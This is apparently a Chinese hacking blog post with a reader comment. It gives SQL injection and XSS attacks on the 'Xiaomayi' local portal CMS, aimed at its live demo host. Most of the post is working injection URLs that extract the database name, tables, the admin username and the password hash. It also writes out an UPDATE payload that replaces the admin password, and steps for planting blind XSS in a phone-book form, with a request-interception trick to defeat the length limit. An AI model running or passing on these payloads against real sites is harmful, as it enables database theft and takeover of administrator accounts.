小蚂蚁地方门户系统sql注入与XSS

1.SQL注入:
[php]
http://demo.xiaomayi.co/public/ajax.aspx?action=addcomparebuild&cname=a’and%20db_name()%3E0–

demo_xiaomayi_co
http://demo.xiaomayi.co/public/ajax.aspx?action=addcomparebuild&cname=a’and (select top 1 name from demo_xiaomayi_co.dbo.sysobjects where xtype=CHAR(85))>0–

http://demo.xiaomayi.co/public/ajax.aspx?action=addcomparebuild&cname=a’and (select top 1 username from Ant_admin)>0– 出帐号

http://demo.xiaomayi.co/public/ajax.aspx?action=addcomparebuild&cname=a’and (select top 1 password from Ant_admin)>0– 出密码散列

替换密码
paLhASC5WX1ZUvaBeDN+lQ==,换好后,管理员admin密码就是weiwei0307

这个破鸟,发现是假的`真的需要你自己找办法..

update Ant_admin set password=’ViBrW10pU1RVIldbWlhUVFYiKV9dWFRRJSRcWlErUCQmUCxeWVlQUydZK19fXSNR’ where Username=’用户名’–
[php]
2.xss
xss可盲打后台
首页前台的XSS在发布黄页的电话薄首先要注册一个会员,当然这些门户站点都会开放注册登录,注册好之后到发布黄页电话薄的地方。

URL:http://demo.xiaomayi.co/Life/phonebookadd.aspx?action=edit

这边的电话和手机后台都没过滤,不过前台有长度限制,抓包修改一下就OK了,然后提交

原文链接:,转发请注明来源!

发表评论

要发表评论,您必须先登录

  • 2 Responses to “小蚂蚁地方门户系统sql注入与XSS”
    • hackex

      我对XSS 确实没有怎么了解过,能否请教下您??password='ViBrW10pU1RVIldbWlhUVFYiKV9dWFRRJSRcWlErUCQmUCxeWVlQUydZK19fXSNR' 想了解一下这里的密码是怎么生成的? 要做怎么样的反解密呢?